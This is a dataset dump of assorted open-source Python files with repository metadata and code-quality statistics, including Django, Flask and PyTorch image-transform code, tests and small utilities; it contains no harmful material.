hexsha
string
size
int64
ext
string
lang
string
max_stars_repo_path
string
max_stars_repo_name
string
max_stars_repo_head_hexsha
string
max_stars_repo_licenses
list
max_stars_count
int64
max_stars_repo_stars_event_min_datetime
string
max_stars_repo_stars_event_max_datetime
string
max_issues_repo_path
string
max_issues_repo_name
string
max_issues_repo_head_hexsha
string
max_issues_repo_licenses
list
max_issues_count
int64
max_issues_repo_issues_event_min_datetime
string
max_issues_repo_issues_event_max_datetime
string
max_forks_repo_path
string
max_forks_repo_name
string
max_forks_repo_head_hexsha
string
max_forks_repo_licenses
list
max_forks_count
int64
max_forks_repo_forks_event_min_datetime
string
max_forks_repo_forks_event_max_datetime
string
content
string
avg_line_length
float64
max_line_length
int64
alphanum_fraction
float64
qsc_code_num_words_quality_signal
int64
qsc_code_num_chars_quality_signal
float64
qsc_code_mean_word_length_quality_signal
float64
qsc_code_frac_words_unique_quality_signal
float64
qsc_code_frac_chars_top_2grams_quality_signal
float64
qsc_code_frac_chars_top_3grams_quality_signal
float64
qsc_code_frac_chars_top_4grams_quality_signal
float64
qsc_code_frac_chars_dupe_5grams_quality_signal
float64
qsc_code_frac_chars_dupe_6grams_quality_signal
float64
qsc_code_frac_chars_dupe_7grams_quality_signal
float64
qsc_code_frac_chars_dupe_8grams_quality_signal
float64
qsc_code_frac_chars_dupe_9grams_quality_signal
float64
qsc_code_frac_chars_dupe_10grams_quality_signal
float64
qsc_code_frac_chars_replacement_symbols_quality_signal
float64
qsc_code_frac_chars_digital_quality_signal
float64
qsc_code_frac_chars_whitespace_quality_signal
float64
qsc_code_size_file_byte_quality_signal
float64
qsc_code_num_lines_quality_signal
float64
qsc_code_num_chars_line_max_quality_signal
float64
qsc_code_num_chars_line_mean_quality_signal
float64
qsc_code_frac_chars_alphabet_quality_signal
float64
qsc_code_frac_chars_comments_quality_signal
float64
qsc_code_cate_xml_start_quality_signal
float64
qsc_code_frac_lines_dupe_lines_quality_signal
float64
qsc_code_cate_autogen_quality_signal
float64
qsc_code_frac_lines_long_string_quality_signal
float64
qsc_code_frac_chars_string_length_quality_signal
float64
qsc_code_frac_chars_long_word_length_quality_signal
float64
qsc_code_frac_lines_string_concat_quality_signal
float64
qsc_code_cate_encoded_data_quality_signal
float64
qsc_code_frac_chars_hex_words_quality_signal
float64
qsc_code_frac_lines_prompt_comments_quality_signal
float64
qsc_code_frac_lines_assert_quality_signal
float64
qsc_codepython_cate_ast_quality_signal
float64
qsc_codepython_frac_lines_func_ratio_quality_signal
float64
qsc_codepython_cate_var_zero_quality_signal
bool
qsc_codepython_frac_lines_pass_quality_signal
float64
qsc_codepython_frac_lines_import_quality_signal
float64
qsc_codepython_frac_lines_simplefunc_quality_signal
float64
qsc_codepython_score_lines_no_logic_quality_signal
float64
qsc_codepython_frac_lines_print_quality_signal
float64
qsc_code_num_words
int64
qsc_code_num_chars
int64
qsc_code_mean_word_length
int64
qsc_code_frac_words_unique
null
qsc_code_frac_chars_top_2grams
int64
qsc_code_frac_chars_top_3grams
int64
qsc_code_frac_chars_top_4grams
int64
qsc_code_frac_chars_dupe_5grams
int64
qsc_code_frac_chars_dupe_6grams
int64
qsc_code_frac_chars_dupe_7grams
int64
qsc_code_frac_chars_dupe_8grams
int64
qsc_code_frac_chars_dupe_9grams
int64
qsc_code_frac_chars_dupe_10grams
int64
qsc_code_frac_chars_replacement_symbols
int64
qsc_code_frac_chars_digital
int64
qsc_code_frac_chars_whitespace
int64
qsc_code_size_file_byte
int64
qsc_code_num_lines
int64
qsc_code_num_chars_line_max
int64
qsc_code_num_chars_line_mean
int64
qsc_code_frac_chars_alphabet
int64
qsc_code_frac_chars_comments
int64
qsc_code_cate_xml_start
int64
qsc_code_frac_lines_dupe_lines
int64
qsc_code_cate_autogen
int64
qsc_code_frac_lines_long_string
int64
qsc_code_frac_chars_string_length
int64
qsc_code_frac_chars_long_word_length
int64
qsc_code_frac_lines_string_concat
null
qsc_code_cate_encoded_data
int64
qsc_code_frac_chars_hex_words
int64
qsc_code_frac_lines_prompt_comments
int64
qsc_code_frac_lines_assert
int64
qsc_codepython_cate_ast
int64
qsc_codepython_frac_lines_func_ratio
int64
qsc_codepython_cate_var_zero
int64
qsc_codepython_frac_lines_pass
int64
qsc_codepython_frac_lines_import
int64
qsc_codepython_frac_lines_simplefunc
int64
qsc_codepython_score_lines_no_logic
int64
qsc_codepython_frac_lines_print
int64
effective
string
hits
int64
81c27ee4cdfe2a26ef7b4b636be36e22e9764ebe
221
py
Python
argostranslate/model.py
rushter/argos-translate
1a72c890bece98e8f3f506acf949b571d7d3bc7e
[ "MIT" ]
null
null
null
argostranslate/model.py
rushter/argos-translate
1a72c890bece98e8f3f506acf949b571d7d3bc7e
[ "MIT" ]
null
null
null
argostranslate/model.py
rushter/argos-translate
1a72c890bece98e8f3f506acf949b571d7d3bc7e
[ "MIT" ]
null
null
null
class LanguageModel: def infer(x): """Run language model on input x Args: x (str): Prompt to run inference on Returns: (str) Output of inference """ return prompt
20.090909
47
0.542986
26
221
4.615385
0.730769
0
0
0
0
0
0
0
0
0
0
0
0.380091
221
10
48
22.1
0.875912
0.506787
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0
0
1
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
3
81e581ca8e25c5c732b7c9a6938959e1ce1dfd28
802
py
Python
pyano2/admin.py
mental689/pyano
2bc75e79618392f2013dfde2ac8035fe5fa1dc61
[ "MIT" ]
1
2022-01-31T17:34:37.000Z
2022-01-31T17:34:37.000Z
pyano2/admin.py
mental689/pyano
2bc75e79618392f2013dfde2ac8035fe5fa1dc61
[ "MIT" ]
null
null
null
pyano2/admin.py
mental689/pyano
2bc75e79618392f2013dfde2ac8035fe5fa1dc61
[ "MIT" ]
null
null
null
from django.contrib import admin from .models import * # Register your models here. admin.site.register(SystemSetting) admin.site.register(Topic) admin.site.register(Keyword) admin.site.register(SearchResult) admin.site.register(Invitation) admin.site.register(Alternative) admin.site.register(Credit) admin.site.register(VATICJobGroup) admin.site.register(VATICJob) admin.site.register(VATICVideo) admin.site.register(VATICSegment) admin.site.register(VATICLabel) admin.site.register(VATICAttribute) admin.site.register(AttributeAnnotation) admin.site.register(VATICPath) admin.site.register(VATICBox) admin.site.register(VATICBid) admin.site.register(VATICWorkerJob) admin.site.register(BannedVideo) admin.site.register(FreebaseTopic) admin.site.register(BlockedChannel) admin.site.register(Comment)
30.846154
40
0.840399
100
802
6.74
0.32
0.293769
0.554896
0
0
0
0
0
0
0
0
0
0.043641
802
26
41
30.846154
0.878748
0.032419
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
0.083333
0
0.083333
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
c4ad1b24aa893f34849a43e69fbd9ee2ed739b29
436
py
Python
coding_interviews/leetcode/medium/subrectangle_queries/subrectangle_queries.py
LeandroTk/Algorithms
569ed68eba3eeff902f8078992099c28ce4d7cd6
[ "MIT" ]
205
2018-12-01T17:49:49.000Z
2021-12-22T07:02:27.000Z
coding_interviews/leetcode/medium/subrectangle_queries/subrectangle_queries.py
LeandroTk/Algorithms
569ed68eba3eeff902f8078992099c28ce4d7cd6
[ "MIT" ]
2
2020-01-01T16:34:29.000Z
2020-04-26T19:11:13.000Z
coding_interviews/leetcode/medium/subrectangle_queries/subrectangle_queries.py
LeandroTk/Algorithms
569ed68eba3eeff902f8078992099c28ce4d7cd6
[ "MIT" ]
50
2018-11-28T20:51:36.000Z
2021-11-29T04:08:25.000Z
# https://leetcode.com/problems/subrectangle-queries class SubrectangleQueries: def __init__(self, rectangle): self.rectangle = rectangle def updateSubrectangle(self, row1, col1, row2, col2, newValue): for row in range(row1, row2 + 1): for col in range(col1, col2 + 1): self.rectangle[row][col] = newValue def getValue(self, row, col): return self.rectangle[row][col]
29.066667
67
0.639908
52
436
5.288462
0.5
0.189091
0.116364
0.138182
0
0
0
0
0
0
0
0.030488
0.247706
436
14
68
31.142857
0.807927
0.114679
0
0
0
0
0
0
0
0
0
0
0
1
0.333333
false
0
0
0.111111
0.555556
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
c4b988e816739bae58b4243c6f71e763bf88bc25
224
py
Python
drdown/forum/views/view_base.py
fga-gpp-mds/2018.1-Cris-Down
3423374360105b06ac2c57a320bf2ee8deaa08a3
[ "MIT" ]
11
2018-03-11T01:21:43.000Z
2018-06-19T21:51:33.000Z
drdown/forum/views/view_base.py
fga-gpp-mds/2018.1-Grupo12
3423374360105b06ac2c57a320bf2ee8deaa08a3
[ "MIT" ]
245
2018-03-13T19:07:14.000Z
2018-07-07T22:46:00.000Z
drdown/forum/views/view_base.py
fga-gpp-mds/2018.1-Grupo12
3423374360105b06ac2c57a320bf2ee8deaa08a3
[ "MIT" ]
12
2018-08-24T13:26:04.000Z
2021-03-27T16:28:22.000Z
class BaseViewTemplate(): def get_template(self): if self.request.user.is_authenticated: template = "core/base.html" else: template = "core/base-nav.html" return template
24.888889
46
0.598214
24
224
5.5
0.708333
0.181818
0.242424
0
0
0
0
0
0
0
0
0
0.303571
224
8
47
28
0.846154
0
0
0
0
0
0.142857
0
0
0
0
0
0
1
0.142857
false
0
0
0
0.428571
0
1
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
c4c4554ca4d1294d115fc76632f5ae5d07210b8b
726
py
Python
setup.py
rkyoto/monotonic_cffi
8b2394ee65bcf16ab8d47f53db013ed39289a8d4
[ "Apache-2.0" ]
1
2016-05-03T06:51:10.000Z
2016-05-03T06:51:10.000Z
setup.py
rkyoto/monotonic_cffi
8b2394ee65bcf16ab8d47f53db013ed39289a8d4
[ "Apache-2.0" ]
null
null
null
setup.py
rkyoto/monotonic_cffi
8b2394ee65bcf16ab8d47f53db013ed39289a8d4
[ "Apache-2.0" ]
null
null
null
try: from setuptools import setup except ImportError: from distutils.core import setup setup( name='monotonic_cffi', version='0.1', license='Apache', author='Matt Jones', author_email='mattjones1811@hotmail.com', url='https://github.com/rkyoto/monotonic_cffi', classifiers=( 'Development Status :: 4 - Beta', 'License :: OSI Approved :: Apache Software License', 'Programming Language :: Python :: 2', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: Implementation :: CPython', 'Programming Language :: Python :: Implementation :: PyPy', ), py_modules=['monotonic_cffi'], install_requires=['cffi'], )
27.923077
70
0.636364
72
726
6.333333
0.666667
0.166667
0.219298
0.171053
0
0
0
0
0
0
0
0.016043
0.227273
726
25
71
29.04
0.796791
0
0
0
0
0
0.525517
0.034483
0
0
0
0
0
1
0
true
0
0.136364
0
0.136364
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
c4ccb59e89df8f337d320277046d41bb4256138b
423
py
Python
application/web/auth/forms.py
satan1a/poopak
9862f09edc22c030db520e317020b54a36e070ac
[ "curl" ]
91
2019-01-17T13:35:49.000Z
2022-03-30T21:16:37.000Z
application/web/auth/forms.py
satan1a/poopak
9862f09edc22c030db520e317020b54a36e070ac
[ "curl" ]
13
2019-01-13T14:35:51.000Z
2021-04-26T05:13:42.000Z
application/web/auth/forms.py
satan1a/poopak
9862f09edc22c030db520e317020b54a36e070ac
[ "curl" ]
33
2019-01-17T13:37:22.000Z
2022-03-25T09:35:54.000Z
from flask_wtf import FlaskForm from wtforms import StringField, PasswordField, SubmitField, validators from wtforms.validators import DataRequired class LoginForm(FlaskForm): username = StringField('Username', validators=[DataRequired()]) password = PasswordField('Password', validators=[DataRequired()]) captcha = StringField('captcha', validators=[validators.required()]) submit = SubmitField("Login")
38.454545
72
0.77305
39
423
8.358974
0.487179
0.067485
0
0
0
0
0
0
0
0
0
0
0.118203
423
11
73
38.454545
0.873995
0
0
0
0
0
0.066038
0
0
0
0
0
0
1
0
false
0.25
0.375
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
1
0
1
0
0
3
c4cf72ce24cd8395c7fc0f71e5b1d935992fdfe1
58
py
Python
workon/contrib/flow/__init__.py
dalou/django-workon
ef63c0a81c00ef560ed693e435cf3825f5170126
[ "BSD-3-Clause" ]
null
null
null
workon/contrib/flow/__init__.py
dalou/django-workon
ef63c0a81c00ef560ed693e435cf3825f5170126
[ "BSD-3-Clause" ]
null
null
null
workon/contrib/flow/__init__.py
dalou/django-workon
ef63c0a81c00ef560ed693e435cf3825f5170126
[ "BSD-3-Clause" ]
null
null
null
default_app_config = 'workon.contrib.flow.apps.FlowConfig'
58
58
0.844828
8
58
5.875
1
0
0
0
0
0
0
0
0
0
0
0
0.034483
58
1
58
58
0.839286
0
0
0
0
0
0.59322
0.59322
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
c4e8d4800d4855b456ea42b39c0cd6188cfeeeed
607
py
Python
tempestatibus/api/models.py
Damiox/tempestatibus-djangorest-reactjs
89f89d40101a39d5c554b279171b7a241601ed99
[ "MIT" ]
null
null
null
tempestatibus/api/models.py
Damiox/tempestatibus-djangorest-reactjs
89f89d40101a39d5c554b279171b7a241601ed99
[ "MIT" ]
3
2020-06-05T17:47:03.000Z
2021-06-10T19:53:59.000Z
tempestatibus/api/models.py
Damiox/tempestatibus-djangorest-reactjs
89f89d40101a39d5c554b279171b7a241601ed99
[ "MIT" ]
null
null
null
from django.db import models class Location(models.Model): city_name = models.CharField(max_length=100) population = models.IntegerField() class Subscription(models.Model): email = models.EmailField() location = models.ForeignKey(Location, on_delete=models.CASCADE) confirmation_id = models.UUIDField(null=True) confirmation_requested_at = models.DateTimeField(null=True) subscribed = models.BooleanField(default=False) subscribed_at = models.DateTimeField(null=True) updated_at = models.DateTimeField(null=True) unsubscribed_at = models.DateTimeField(null=True)
33.722222
68
0.766063
70
607
6.514286
0.528571
0.087719
0.184211
0.219298
0.254386
0
0
0
0
0
0
0.005725
0.136738
607
17
69
35.705882
0.864504
0
0
0
0
0
0
0
0
0
0
0
0
1
0
false
0
0.076923
0
1
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
3
c4fdf9905acfa2f452d481de8842fe7010061a40
154
py
Python
Assets/Scripts/1.py
Kvazikot/Tunel
77eec06d4880f7f70dc2c7fe0afde9d287016cd3
[ "MIT" ]
null
null
null
Assets/Scripts/1.py
Kvazikot/Tunel
77eec06d4880f7f70dc2c7fe0afde9d287016cd3
[ "MIT" ]
null
null
null
Assets/Scripts/1.py
Kvazikot/Tunel
77eec06d4880f7f70dc2c7fe0afde9d287016cd3
[ "MIT" ]
null
null
null
There is two types of x. Classical x and quantum x. Quantum x is acting like a x. But if you ask quantum x a straight question, c can say "How dare you?"
30.8
56
0.74026
33
154
3.454545
0.69697
0.210526
0
0
0
0
0
0
0
0
0
0
0.214286
154
5
57
30.8
0.942149
0
0
0
0
0
0.083871
0
0
0
0
0
0
0
null
null
0
0
null
null
0
0
0
0
null
1
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
0
0
3
f2012b78254667f56614c0bb8b97e835ce91973f
632
py
Python
apps/merchant/unittests/test_factories.py
lsdlab/djshop_toturial
6d450225cc05e6a1ecd161de2b522e1af0b68cc0
[ "MIT" ]
null
null
null
apps/merchant/unittests/test_factories.py
lsdlab/djshop_toturial
6d450225cc05e6a1ecd161de2b522e1af0b68cc0
[ "MIT" ]
6
2020-06-07T15:18:58.000Z
2021-09-22T19:07:33.000Z
apps/merchant/unittests/test_factories.py
lsdlab/djshop_toturial
6d450225cc05e6a1ecd161de2b522e1af0b68cc0
[ "MIT" ]
null
null
null
from django.test import TestCase from django.forms.models import model_to_dict from nose.tools import eq_ from apps.merchant.unittests.factories import MerchantFactory from apps.merchant.serializers import MerchantSerializer class TestMerchantSerializer(TestCase): def setUp(self): self.data = model_to_dict(MerchantFactory.build()) def test_serializer_with_empty_data(self): serializer = MerchantSerializer(data={}) eq_(serializer.is_valid(), False) def test_serializer_with_valid_data(self): serializer = MerchantSerializer(data=self.data) eq_(serializer.is_valid(), True)
31.6
61
0.764241
76
632
6.131579
0.447368
0.051502
0.04721
0.090129
0.261803
0
0
0
0
0
0
0
0.155063
632
19
62
33.263158
0.872659
0
0
0
0
0
0
0
0
0
0
0
0
1
0.214286
false
0
0.357143
0
0.642857
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
1
0
0
3
f203bd6f70452ba13460619326e4163af498ac93
209
py
Python
exl_env/lib/python3.6/site-packages/imblearn/combine/__init__.py
verma-varsha/fraud-detection
13c5b0c274dfa2b68e82a4ee317e09223b5b663f
[ "MIT" ]
2
2019-09-14T23:23:35.000Z
2019-09-16T18:17:19.000Z
exl_env/lib/python3.6/site-packages/imblearn/combine/__init__.py
verma-varsha/fraud-detection
13c5b0c274dfa2b68e82a4ee317e09223b5b663f
[ "MIT" ]
null
null
null
exl_env/lib/python3.6/site-packages/imblearn/combine/__init__.py
verma-varsha/fraud-detection
13c5b0c274dfa2b68e82a4ee317e09223b5b663f
[ "MIT" ]
2
2019-04-02T18:03:29.000Z
2019-04-02T21:34:08.000Z
"""The :mod:`imblearn.combine` provides methods which combine over-sampling and under-sampling. """ from ._smote_enn import SMOTEENN from ._smote_tomek import SMOTETomek __all__ = ['SMOTEENN', 'SMOTETomek']
23.222222
61
0.770335
26
209
5.884615
0.730769
0.117647
0
0
0
0
0
0
0
0
0
0
0.114833
209
8
62
26.125
0.827027
0.440191
0
0
0
0
0.163636
0
0
0
0
0
0
1
0
false
0
0.666667
0
0.666667
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
f210fd06fb8a3ebc717715780dfa9e1e53c2d3f2
3,792
py
Python
jactorch/transforms/bbox/transforms.py
dapatil211/Jacinle
7638a46dc06223a1871d88f92aade644883f40a0
[ "MIT" ]
114
2018-01-25T04:44:07.000Z
2022-03-09T14:33:42.000Z
third_party/Jacinle/jactorch/transforms/bbox/transforms.py
dair-iitd/1oML_workdir
37117de4abf1774548786e9534c90977d67091d8
[ "Apache-2.0" ]
7
2018-05-08T17:02:24.000Z
2022-02-09T23:44:06.000Z
third_party/Jacinle/jactorch/transforms/bbox/transforms.py
dair-iitd/1oML_workdir
37117de4abf1774548786e9534c90977d67091d8
[ "Apache-2.0" ]
268
2018-04-08T10:54:35.000Z
2022-03-01T07:10:02.000Z
#! /usr/bin/env python3 # -*- coding: utf-8 -*- # File : transforms.py # Author : Jiayuan Mao # Email : maojiayuan@gmail.com # Date : 03/03/2018 # # This file is part of Jacinle. # Distributed under terms of the MIT license. import random import torch import torchvision.transforms as transforms import jactorch.transforms.image as jac_transforms from . import functional as F __all__ = ["Compose", "Lambda", "ToTensor", "NormalizeBbox", "DenormalizeBbox", "Normalize", "Resize", "CenterCrop", "Pad", "RandomCrop", "RandomHorizontalFlip", "RandomVerticalFlip", "RandomResizedCrop", "LinearTransformation", "ColorJitter", "RandomRotation", "Grayscale", "RandomGrayscale", "PadMultipleOf"] class Compose(transforms.Compose): def __call__(self, img, bbox): for t in self.transforms: img, bbox = t(img, bbox) return img, bbox class Lambda(transforms.Lambda): def __call__(self, img, bbox): return self.lambd(img, bbox) class ToTensor(transforms.ToTensor): def __call__(self, img, bbox): # TODO(Jiayuan Mao @ 07/23): check whether bboxes are out of the image. return super().__call__(img), torch.from_numpy(bbox) class NormalizeBbox(object): def __call__(self, img, bbox): return F.normalize_bbox(img, bbox) class DenormalizeBbox(object): def __call__(self, img, bbox): return F.denormalize_bbox(img, bbox) class Normalize(transforms.Normalize): def __call__(self, img, bbox): return super().__call__(img), bbox class Resize(transforms.Resize): # Assuming bboxdinates are 0/1-normalized. def __call__(self, img, bbox): return super().__call__(img), bbox class CenterCrop(transforms.CenterCrop): def __call__(self, img, bbox): return F.center_crop(img, bbox, self.size) class Pad(transforms.Pad): def __call__(self, img, bbox): return F.pad(img, bbox, self.padding, self.fill) class RandomCrop(transforms.RandomCrop): def __call__(self, img, bbox): if self.padding > 0: img = F.pad(img, bbox, self.padding) i, j, h, w = self.get_params(img, self.size) return F.crop(img, bbox, i, j, h, w) class RandomHorizontalFlip(transforms.RandomHorizontalFlip): def __call__(self, img, bbox): if random.random() < 0.5: return F.hflip(img, bbox) return img, bbox class RandomVerticalFlip(transforms.RandomVerticalFlip): def __call__(self, img, bbox): if random.random() < 0.5: return F.vflip(img, bbox) return img, bbox class RandomResizedCrop(transforms.RandomResizedCrop): def __call__(self, img, bbox): i, j, h, w = self.get_params(img, self.scale, self.ratio) return F.resized_crop(img, bbox, i, j, h, w, self.size, self.interpolation) class Grayscale(transforms.Grayscale): def __call__(self, img, bbox): return super().__call__(img), bbox class RandomGrayscale(transforms.RandomGrayscale): def __call__(self, img, bbox): return super().__call__(img), bbox class LinearTransformation(transforms.LinearTransformation): def __call__(self, tensor, bbox): return super().__call__(tensor), bbox class ColorJitter(transforms.ColorJitter): def __call__(self, img, bbox): return super().__call__(img), bbox class RandomRotation(transforms.RandomRotation): def __call__(self, img, bbox): assert self.degrees[0] == self.degrees[1] == 0 angle = self.get_params(self.degrees) return F.rotate(img, bbox, angle, self.resample, self.expand, self.center) class PadMultipleOf(jac_transforms.PadMultipleOf): def __call__(self, img, coor): return F.pad_multiple_of(img, coor, self.multiple)
28.298507
123
0.674314
466
3,792
5.229614
0.253219
0.109151
0.085761
0.103406
0.3016
0.274928
0.208453
0.171112
0.145671
0.125975
0
0.00796
0.204905
3,792
133
124
28.511278
0.800332
0.085179
0
0.346154
0
0
0.064796
0
0
0
0
0.007519
0.012821
1
0.24359
false
0
0.064103
0.166667
0.820513
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
480dbef9c647a59a9f7d77e455eb6accc71a104e
2,622
py
Python
seed_services_client/auth.py
praekeltfoundation/seed-services-client
bfb216b6b770f9433bd9cda573f13199c4afee9c
[ "BSD-3-Clause" ]
null
null
null
seed_services_client/auth.py
praekeltfoundation/seed-services-client
bfb216b6b770f9433bd9cda573f13199c4afee9c
[ "BSD-3-Clause" ]
25
2016-06-24T14:37:51.000Z
2018-06-26T09:08:31.000Z
seed_services_client/auth.py
praekeltfoundation/seed-services-client
bfb216b6b770f9433bd9cda573f13199c4afee9c
[ "BSD-3-Clause" ]
null
null
null
from demands import JSONServiceClient, HTTPServiceClient class AuthApiClient(object): """ Client for Auth Service. :param str email: An email address. :param str password: A password. :param str api_url: The full URL of the API. """ def __init__(self, email, password, api_url, session=None, session_http=None): if session is None: session = JSONServiceClient(url=api_url) # login data = {"email": email, "password": password} login = session.post('/user/tokens/', data=data) self.token = login["token"] headers = {'Authorization': 'Token %s' % self.token} session = JSONServiceClient(url=api_url, headers=headers) self.session = session if session_http is None: session_http = HTTPServiceClient(url=api_url, headers=headers) self.session_http = session_http def get_permissions(self): return self.session.get('/user/') def get_users(self): return self.session.get('/users/') def create_user(self, user): return self.session.post('/users/', data=user) def get_user(self, user): return self.session.get('/users/%s/' % user) def update_user(self, user_id, user): return self.session.put('/users/%s/' % user_id, data=user) def remove_user_from_team(self, user, team): # Returns a 204 with empty content so lets return True if it worked response = self.session_http.delete('/teams/%s/users/%s/' % ( team, user,)) if response.status_code == 204: return True else: return False def add_user_to_team(self, user, team): # Returns a 204 with empty content so lets return True if it worked response = self.session_http.put('/teams/%s/users/%s/' % (team, user,)) if response.status_code == 204: return True else: return False def delete_user(self, user_id): # archives, soft delete response = self.session_http.delete('/users/%s/' % user_id) if response.status_code == 204: return True else: return False def get_teams(self): return self.session.get('/teams/') def create_team(self, org, team): return self.session.post('/organizations/%s/teams/' % org, data=team) def create_permission(self, team, permission): return self.session.post('/teams/%s/permissions/' % team, data=permission)
30.847059
79
0.593822
317
2,622
4.788644
0.236593
0.094203
0.089592
0.052701
0.447958
0.331357
0.293149
0.248353
0.248353
0.248353
0
0.008112
0.294813
2,622
84
80
31.214286
0.812872
0.120519
0
0.235294
0
0
0.085323
0.020336
0
0
0
0
0
1
0.235294
false
0.039216
0.019608
0.156863
0.54902
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
4823f4da829fca9d3d8e130f43e5372ae7a9fcf5
4,206
py
Python
test/bibliopixel/util/offset_range_test.py
rec/leds
ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a
[ "MIT" ]
253
2015-01-03T23:17:57.000Z
2021-12-14T02:31:08.000Z
test/bibliopixel/util/offset_range_test.py
rec/leds
ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a
[ "MIT" ]
879
2015-01-11T16:07:25.000Z
2021-12-10T16:24:31.000Z
test/bibliopixel/util/offset_range_test.py
rec/leds
ed5fd11ed155e7008d4ef6d5b3d82cd7f8b3ed6a
[ "MIT" ]
71
2015-01-04T01:02:47.000Z
2022-03-25T18:30:10.000Z
import unittest from bibliopixel.util import offset_range class OffsetRangeTest(unittest.TestCase): def test_empty(self): dmx = offset_range.DMXChannel.make() self.assertEqual(dmx.index(0), None) self.assertEqual(dmx.index(1), 0) self.assertEqual(dmx.index(2), 1) self.assertEqual(dmx.index(511), 510) self.assertEqual(dmx.index(512), 511) self.assertEqual(dmx.index(513), None) l256 = list(range(256)) r = list(dmx.read_from(l256)) self.assertEqual(r, l256 + ([0] * 256)) target = [23] * 128 dmx.copy_to(l256, target) self.assertEqual(target, list(range(128))) def test_empty_copy(self): dmx = offset_range.DMXChannel.make() l256 = list(range(256)) r = list(dmx.read_from(l256)) self.assertEqual(r, l256 + ([0] * 256)) target = [] dmx.copy_to(l256, target) self.assertEqual(target, []) def test_positive_offset(self): midi = offset_range.MidiChannel(offset=4) self.assertEqual(midi.index(0), None) self.assertEqual(midi.index(1), None) self.assertEqual(midi.index(4), None) self.assertEqual(midi.index(5), 0) self.assertEqual(midi.index(6), 1) self.assertEqual(midi.index(15), 10) self.assertEqual(midi.index(16), 11) self.assertEqual(midi.index(16), 11) self.assertEqual(midi.index(17), None) expected = [-1, -1, -1, -1] + list(range(12)) actual = list(midi.read_from(range(16), pad=-1)) self.assertEqual(expected, actual) target = [100] * 100 midi.copy_to(list(range(16)), target) expected = list(range(4, 16)) + [100] * 88 self.assertEqual(target, expected) def test_negative_offset(self): midi = offset_range.MidiChannel(-4) self.assertEqual(midi.index(0), None) self.assertEqual(midi.index(1), 4) self.assertEqual(midi.index(2), 5) self.assertEqual(midi.index(12), 15) self.assertEqual(midi.index(13), None) actual = list(midi.read_from(range(16), pad=-1)) expected = list(range(4, 16)) + [-1, -1, -1, -1] self.assertEqual(expected, actual) target = [100] * 8 midi.copy_to(list(range(16)), target) expected = [4, 5, 6, 7, 8, 9, 10, 11] self.assertEqual(target, expected) def test_begin_end_offset(self): midi = offset_range.MidiChannel(offset=-5, begin=6, end=8) self.assertEqual(midi.index(0), None) self.assertEqual(midi.index(4), None) self.assertEqual(midi.index(5), None) self.assertEqual(midi.index(6), 10) self.assertEqual(midi.index(7), 11) self.assertEqual(midi.index(8), 12) self.assertEqual(midi.index(9), None) self.assertEqual(midi.index(10), None) actual = list(midi.read_from(range(16))) expected = [0, 0, 0, 0, 0, 10, 11, 12, 0, 0, 0, 0, 0, 0, 0, 0] self.assertEqual(expected, actual) target = [100] * 24 midi.copy_to(list(range(7)), target) expected = 5 * [100] + [5, 6] + 17 * [100] self.assertEqual(target, expected) target = [100] * 24 midi.copy_to(list(range(8)), target) expected = 5 * [100] + [5, 6, 7] + 16 * [100] self.assertEqual(target, expected) target = [100] * 24 midi.copy_to(list(range(9)), target) expected = 5 * [100] + [5, 6, 7] + 16 * [100] self.assertEqual(target, expected) def test_errors(self): with self.assertRaises(ValueError): offset_range.MidiChannel(begin=0) offset_range.MidiChannel(begin=1) offset_range.MidiChannel(begin=16) with self.assertRaises(ValueError): offset_range.MidiChannel(begin=17) with self.assertRaises(ValueError): offset_range.MidiChannel(end=0) offset_range.MidiChannel(end=1) offset_range.MidiChannel(end=16) with self.assertRaises(ValueError): offset_range.MidiChannel(end=17) with self.assertRaises(ValueError): offset_range.MidiChannel(begin=2, end=1)
33.380952
70
0.598431
542
4,206
4.573801
0.121771
0.242033
0.168616
0.212989
0.749092
0.659137
0.567164
0.498992
0.294877
0.268253
0
0.082266
0.257252
4,206
125
71
33.648
0.711268
0
0
0.402062
0
0
0
0
0
0
0
0
0.463918
1
0.061856
false
0
0.020619
0
0.092784
0
0
0
0
null
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
3
48387a159f561009e1c66d6458bea7cdd666812d
1,114
py
Python
